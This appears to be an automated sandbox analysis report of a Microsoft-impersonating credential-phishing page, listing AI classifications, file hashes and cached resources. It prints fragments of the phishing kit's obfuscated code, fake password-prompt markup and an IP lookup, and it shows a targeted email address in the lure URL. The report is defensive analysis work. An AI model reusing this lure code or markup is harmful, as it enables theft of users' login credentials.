20organisation\x20needs\x20more\x20information\x20to\x20keep\x20your\x20account\x20secure.</p>','stringify','<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22password\x22\x20name=\x22pr\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22pr\x22\x20aria-describedby=\x22aiHelp\x22\x20placeholder=\x22Enter\x20Password\x22\x20style=\x22border-right:\x20none;\x20border-left:\x20none;\x20border-top:\x20none;\x22></div>','https://api.ipify.org?format=json','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic5\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br><span\x20class=\x22back-arrow\x22\x20id=\x22back-text\x22></span>\x20\x20\u00a0\u00a0\u00a0\x20<span\x20id=\x22user-email-text\x22\x20style=\x22margin-left:\x20-10px;\x22></span>','onerror','#text-2fa-code','append','#user-email-otc','.logoimg','aja
URL: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "More information required", "prominent_button_name": "Next", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4... Model: Joe Sandbox AI	```json { "risk_score": 1, "reasoning": "The script is a standard jQuery library (v2.2.4) with no high-risk behaviors such as dynamic code execution or data exfiltration. It uses legacy practices and outdated APIs, but these are not inherently malicious. The script is widely recognized and trusted, reducing its risk score." }
/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license / !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(e.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:g,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]\|\|{},h++),"object"==typeof g\|\|n.isFunction(g)\|\|(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)\|\|(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)\|\|a.nodeType\|\|n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype\|\|{},"isPrototypeOf"))return!1;for(b in a);return void 0===b\|\|k.call(a,b)},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a\|\|"function"==typeof a?i[j.call(a)]\|\|"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=d.createElement("script"),b.text=a,d.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b\|\|[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:h.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(arguments,2),f=function(){return a.apply(b\|\|this,d.concat(e.call(arguments)))},f.guid=a.guid=a.guid\|\|n.guid++,f):void 0},now:Date.now,support:l}),"function"==typeof Symbol&&(n.fn[Symbol.iterator]=c[Symbol.iterator]),n.each("Boolean Number String Function Array Date RegExp Obj
URL: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Because you're accessing sensitive info, you need to verify your password", "prominent_button_name": "Sign In", "text_input_field_labels": [ "Enter Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "finance" } Google indexed: False

URL: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] } Google indexed: False
	{ "brands": [ "Microsoft" ] } Google indexed: False
URL: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'keep.za.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'za.com' is a generic domain and not directly associated with Microsoft.", "The presence of an input field for 'Enter Password' on a non-Microsoft domain is suspicious.", "The URL does not contain any direct reference to Microsoft, which is a common tactic in phishing attempts." ], "riskscore": 9} Google indexed: False
URL: keep.za.com Brands: Microsoft Input Fields: Enter Password

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 6 20:21:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9923433108599564
Encrypted:	false
SSDEEP:
MD5:	61A9BB70535007C2D0ACFB4D8707548C
SHA1:	AEA86DBF0F5A56AC7A153D31BD818D491F36E7B0
SHA-256:	E5D691A3708AD7657C645739E487D3B2AB9A1881E614A79C53760FE7AD01E962
SHA-512:	936296F7D10E6B8B5C54B5FB294E51EFEF34832BD7E4D29C52CF385C9EF5E545CCC2F9C2A6742A25630ADD13E3B581A9C1A08D9781F3845BC877B53016E4F1BF
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......".x..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IFZ......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFZ......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFZ......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFZ............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFZ.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$H......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 6 20:21:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.009734767357073
Encrypted:	false
SSDEEP:
MD5:	BDE57DD60695E55BED11EA868C3A981F
SHA1:	851102892C4C26E0BA6326447177813CCE3CCD25
SHA-256:	0700EC12208D66118BA9D12634C5FE6128462D716ECE5C53C7BAB1B3A7CF3DFE
SHA-512:	F34649CA56717595AA76427EF8FDE1A55E322594DBAB2A4CA250CD40CBA710859D8CEFE821BA50060D4CF8B0182C9FF8F6547BB36278D715C5B0B42FD84B53F3
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......".x..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IFZ......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFZ......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFZ......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFZ............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFZ.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$H......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.015181924547301
Encrypted:	false
SSDEEP:
MD5:	CA93CD1FDB2D2C4ADE4F74C59E67A916
SHA1:	124ADBDF3F02D3A670C7725BA4879F9B93A8310D
SHA-256:	CBDEDBE53890E4707552D2BF3BAE26FE812856595BC5F29F7794290D76833BCE
SHA-512:	4E78CE0246B874020BCBEEE140B677BA57D70B9F8A26381024E1BFCEEDBD8EC2F1A7882AED14976BB0347E0E8576865329383B7255F8CA70CCC237408D710C3A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IFZ......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFZ......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFZ......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFZ............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$H......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 6 20:21:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.007289846491282
Encrypted:	false
SSDEEP:
MD5:	1F5D790C744D4FF1CA3D09B79ED129AD
SHA1:	98C17EE3D4F5A4E912CBBE303855EF1004611FB9
SHA-256:	12E8CCFBB5E953DDF0812603A3F6D2332D55B1F58BD2FD0EB0117E305C365CA5
SHA-512:	7C95A680AFB99862ED7C63D8F3B62ADE8949439211398C71CB4FC7DBB0BC56D9AD0CDF5E65F6C145C4646076452A05D2108BD3A0F4B4CCF6DDC4263E677E5636
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......".x..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IFZ......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFZ......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFZ......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFZ............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFZ.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$H......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 6 20:21:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9969740267965927
Encrypted:	false
SSDEEP:
MD5:	84D3495252860A56E0412074A78BF2F0
SHA1:	0AB18D8F0854A23859F5665F50742068DDD5DC1A
SHA-256:	784D7826FEE2989BB3DF009399D28753A8D00C30989DCA5FCC4C453D0A814CD2
SHA-512:	AC7EBA4BC0C6C1002F7BA0E8A779F69FE22ABE5D1273B44FD91B847268AE3CC460224289375C005FED9CCB22FFA50932F5488B71B00E80A611DCD9C381E8C8D2
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......".x..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IFZ......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFZ......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFZ......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFZ............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFZ.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$H......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Feb 6 20:21:50 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.0055190928480755
Encrypted:	false
SSDEEP:
MD5:	D76377B82AF5AC7AF32A3EAC4AE1D11E
SHA1:	3F813D94CF3909AB216FA63263274410015E6F17
SHA-256:	6EDE30C1405A654EEBD737588688910D7C90200A49AAD8CF3C6225D7713101D1
SHA-512:	534D61F6229480D89F316249274BE63C0584D482411AF04A01FC2F01D679A2C4E12922B3E04E9E24E0135721F9B3765955AD9EF5CBA94EF0CF351A79E00AF02C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......".x..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IFZ......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VFZ......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VFZ......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VFZ............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFZ.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$H......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 77

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	21
Entropy (8bit):	3.594465636961452
Encrypted:	false
SSDEEP:
MD5:	909AD59B6307B0CD8BFE7961D4B98778
SHA1:	49F8111D613317EA86C6A45CD608DC96B1C8451B
SHA-256:	FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
SHA-512:	8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
Malicious:	false
Reputation:	unknown
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"8.46.123.189"}

Chrome Cache Entry: 78

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	unknown
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 79

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (945), with CRLF line terminators
Category:	downloaded
Size (bytes):	1605
Entropy (8bit):	5.285446596771358
Encrypted:	false
SSDEEP:
MD5:	7A9C4D2334F86F5B0C43849B70322501
SHA1:	0B09F9DE4D452E19026910FCEE87FFD39363AB85
SHA-256:	5C0B2E5C4EBDEC6CD3686934D2E2839E5E69DACE045FC8CBF98BA3F390D9CF1D
SHA-512:	E05493D731F4DD6D2089B5F5F39A780155E34A2309F68BC07102A9CF90D788C9EAB1F7AB40794D534BDF32673698D05B6221AF3AC307F6572C72BBEDACAA4CB9
Malicious:	false
Reputation:	unknown
URL:	https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com
Preview:	<!DOCTYPE html>..<html>..<head> .. <title>Microsoft Office</title>.. <meta http-equiv="content-type" content="text/html; charset=UTF-8">.. <meta name="robots" content="noindex, nofollow">.. <meta name="googlebot" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. .. <script type="text/javascript">.. var uid = window.location.hash.substring(1);.. if (!uid) {uid = "";}.. </script>...... <script type="text/javascript" src="https://keep.za.com/cgi/jquery.js" ></script>.. <script type="text/javascript" src="https://keep.za.com/cgi/basic.js" ></script>....</head>..<body> ..<script>(function(){function c(){var b=a.contentDocument\|\|a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90de318a093ef0aa',t:'MTczODg3NjkyNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')

Chrome Cache Entry: 80

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 92, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.002585360278503
Encrypted:	false
SSDEEP:
MD5:	42C18408B5792D6B55BAEC049238CF5B
SHA1:	4A8332BE056693BF2EA8AD1AD2CBF960F9FC3E01
SHA-256:	8B14D8B8D4CC83CB2A3D528A69F584D4972A719DA11EAE4DF57E87B2794A3CBD
SHA-512:	2F16D97D281E351E12E0CBA62D1E0F50C9030B55AB7DABF9EC6B41F1227E4806ADE19DBD139BDBECBF5D39359F30763A4C6DD1D36FD5219BFBF262274FB99B1C
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/90de314d6ff45e68/1738876916539/8aOB73gYzfMabyP
Preview:	.PNG........IHDR.......\..... gH.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 81

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8442), with no line terminators
Category:	dropped
Size (bytes):	8442
Entropy (8bit):	5.738919751460135
Encrypted:	false
SSDEEP:
MD5:	EDFB7EB6EE9AC94BC2221C81830AB204
SHA1:	F4C8CFDAAFD3849F65D52F40F9B84A6ED62A0F81
SHA-256:	3A067F8BEC91A19D679A1C148BA6D1FF9A61A90B74EDE27821AD5E187E4D0AF2
SHA-512:	0186B65111641E19B74E2D5495485B49C79D3CDA4EB6D6605F6B4AD0201EBB3032121CFDE55C77C18851BB05F3D9A4A3D0BE141B0EF265938A5AAF815C7E1561
Malicious:	false
Reputation:	unknown
Preview:	window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=parseInt(V(501))/1(-parseInt(V(543))/2)+parseInt(V(458))/3(-parseInt(V(466))/4)+-parseInt(V(549))/5+-parseInt(V(542))/6+parseInt(V(494))/7+-parseInt(V(482))/8+parseInt(V(529))/9*(parseInt(V(551))/10),e===g)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,534813),h=this\|\|self,i=h[W(438)],j={},j[W(442)]='o',j[W(471)]='s',j[W(520)]='u',j[W(537)]='z',j[W(478)]='n',j[W(475)]='I',j[W(452)]='b',k=j,h[W(477)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,null===E\|\|E===void 0)return G;for(I=n(E),g[a1(449)][a1(464)]&&(I=I[a1(444)](g[a1(449)][a1(464)](E))),I=g[a1(500)][a1(455)]&&g[a1(462)]?g[a1(500)][a1(455)](new g[(a1(462))](I)):function(O,a2,P){for(a2=a1,O[a2(528)](),P=0;P<O[a2(538)];O[P]===O[P+1]?O[a2(498)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(552)][a1(481)](J),K=0;K<I[a1(538)];L=I[K],M=m(g,E,L),J(M)?(N=M==='s'&&!g[a1(506)](E[L]),a1(465)===F+L?H(F+L,M):N\|\|H(

Chrome Cache Entry: 82

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
